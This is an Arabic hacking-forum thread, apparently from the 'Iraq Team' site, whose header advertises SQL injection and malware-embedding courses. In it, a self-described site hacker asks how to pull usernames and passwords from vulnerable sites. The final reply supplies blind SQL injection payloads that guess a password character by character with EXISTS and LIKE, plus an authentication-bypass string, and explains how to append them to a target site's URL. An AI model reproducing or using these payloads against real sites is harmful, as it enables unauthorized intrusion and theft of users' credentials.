1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ سؤال ] ضاق صدري

الموضوع في 'مشاكل / حلول' بواسطة jne, بتاريخ ‏11 ابريل 2014.

كاتب الموضوع : jne المشاهدات : 431 الردود : 4 ‏11 ابريل 2014
حالة الموضوع:
مغلق
  1. غير متصل

    jne
    rank
    Developer

    عضو منذ:
    ‏11 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    [SIبسم الله الرحمن الرحيم

    اخباركم شباب انا محترف اختراق مواقع ولكني تركت فتره 6 اشهر

    وحاليا رجعت احاول الحقن فلا استطيع

    واحاول التخمين فلا استطيع يعني انا عندي الادوات واحضر المواقع المصابه لكن لا يضهر اليوزر والباسورد

    راح اتجنن اتمنه المساعده باأي طريقه او اي شيئ او اي موقع مصاب للاستعاده فقط#ٌnًo.
    ZE="5"][/SIZE]​
     


    جاري تحميل الصفحة...
  2. غير متصل

    Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: ضاق صدري

    حاول اعاده تثبيت البرامج ؟؟؟
     


  3. غير متصل

    jne
    rank
    Developer

    عضو منذ:
    ‏11 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ضاق صدري

    اخي فعلتها ولم يفيد هل تمتلك سكايبي للتكلم والمساعده اي شي)5:"

    ودي
     


  4. غير متصل

    Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: ضاق صدري

    اخي ياليت صوره للتوضيح
     


  5. غير متصل

    or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    رد: ضاق صدري

    اخي عند ايجاد صفحة او موقع مصاب بحقن السكيول او تشك بأنه مصاب بالسكيول . جرب تخمين الباسورد بأستخدام الاكواد التالية , وطبعا قد تطيل هذه العملية ساعات او دقائق حسب الامكانية , اتبع التالي :

    1- ان كان الباسورد (يحتوي) على حرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%ِ%') AND ''='
    2- ان كان الباسورد (يبدأ) بحرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'A%') AND ''='
    
    3- ان كان الباسورد ( يحتوي ) على حرف A (ويتبعه) حرف S , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%A%S%') AND ''='
    
    4- ان كان الباسورد ( يحتوي) على حرف A ( بالمرتبة الرابعة بين الاحرف ) , فيكون الحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
    

    5- ان كنت لا تعرف اليوزر ولا الباسورد , ايضا استخدم هذا الحقن :-


    كود:
    'SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''

    ملاحظة : طريقة الحقن :-


    http://www.xxxx.com/page.php
    حيث xxxx هو رابط الموقع المستهدف
    و page.php هي الصفحة المصابة بحقن السكيول او التي يمكن ان تكون مصابة .


    لاستخدام اي حقنة ضع العلامة ' ثم كود الحقنة بعد رابط الصفحة , مثــال :


    كود HTML:
    http://www.xxxx.com/page.php' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
    
    حيث تم وضع العلامة ' ثم كود الحقنة مباشـــــرتـــا , وهكذا على باقي حقن السكيول SQL.




     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...